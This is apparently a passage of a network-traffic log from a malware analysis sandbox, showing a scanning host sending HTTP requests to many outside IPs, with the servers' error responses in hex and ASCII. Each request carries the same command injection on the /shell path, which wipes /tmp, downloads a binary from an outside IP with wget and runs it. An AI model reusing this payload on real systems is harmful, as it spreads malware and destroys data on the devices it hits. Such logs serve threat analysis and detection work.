                                                          Jan 2, 2024 06:24:18.756077051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.066818953 CET408INHTTP/1.1 401 Unauthorized
                                                          Server: nginx/1.4.5
                                                          Date: Tue, 02 Jan 2024 05:24:18 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 194
                                                          Connection: keep-alive
                                                          WWW-Authenticate: Basic realm="Secure Zone"
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.4.5</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          199192.168.2.2345228103.204.176.20580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:18.853607893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.260917902 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.22.0
                                                          Date: Tue, 02 Jan 2024 05:24:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          200192.168.2.235528269.80.206.8780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.154383898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.303888083 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:17 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          201192.168.2.2341366201.229.167.15980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.178132057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.357872963 CET1286INHTTP/1.1 400 Bad Request
                                                          Server: ZTE web server 1.0 ZTE corp 2015.
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          X-Content-Type-Options: nosniff
                                                          Cache-Control: no-cache,no-store
                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20
                                                          Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its
                                                          Jan 2, 2024 06:24:19.358818054 CET156INData Raw: 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61
                                                          Data Ascii: own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          202192.168.2.236026882.165.119.13380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.252681017 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.499870062 CET490INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:19 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          203192.168.2.235954891.200.67.11080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.258177996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.511079073 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:19 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          204192.168.2.2334468213.29.227.25080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.265733004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.609971046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          205192.168.2.235879854.199.121.17080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.269484997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          206192.168.2.2356372185.110.26.8280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.276073933 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.546664953 CET392INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:19 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          207192.168.2.2346528103.141.149.9080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.516602993 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:19.880481958 CET490INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:21 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          208192.168.2.2341386201.229.167.15980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:19.531088114 CET1286INHTTP/1.1 400 Bad Request
                                                          Server: ZTE web server 1.0 ZTE corp 2015.
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          X-Content-Type-Options: nosniff
                                                          Cache-Control: no-cache,no-store
                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20
